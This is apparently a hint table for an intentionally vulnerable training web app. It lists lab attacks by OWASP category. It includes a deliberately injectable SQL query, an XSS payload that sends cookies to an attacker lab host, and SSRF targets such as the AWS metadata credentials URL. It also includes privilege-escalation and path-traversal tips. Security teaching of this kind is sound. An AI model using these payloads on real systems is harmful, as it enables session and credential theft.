| Injection | sql = '''SELECT username FROM users WHERE username = '%s' and password = '%s' ''' % (username, password) |
|---|---|
| Broken Authentication | Default credentials | Bruteforce (Username: Administrator) |
| Cross Side Scripting Pages | <script>
document.write('<img src="https://evil.lab.zdt.se/evilimage?get='+escape(document.cookie)+'">');
</script> |
| Security Misconfiguration | Fixed SQL injection, try any way. |
| Broken Access Control | Check User ID in URL |
| Broken Session | Flask does not encrypt cookie content, only signs it. |
| Parameter Tampering | Add "is_admin": true to the JSON request body |
| Cross-Site Request Forgery (CSRF) | Visit the evil contractor portal while logged into MDM to trigger device wipe: |
| Cross-Origin Resource Sharing (CORS) | Visit the evil benefits portal while logged into MDM to steal sensitive device data via API |
| Path Traversal | Download /etc/passwd |
| Server-Side Request Forgery (SSRF) |
Login: user/user Demo URLs (safe, mocked responses): • AWS Metadata: http://169.254.169.254/latest/meta-data/• AWS Credentials: http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole• Internal Admin: http://localhost/admin• Secret File: http://localhost/secrets/coca_cola_recipe.txt• External Images: http://evil.lab.zdt.se/[any-path]The image will appear broken for non-image content. Check the Network tab to see the fetched data. |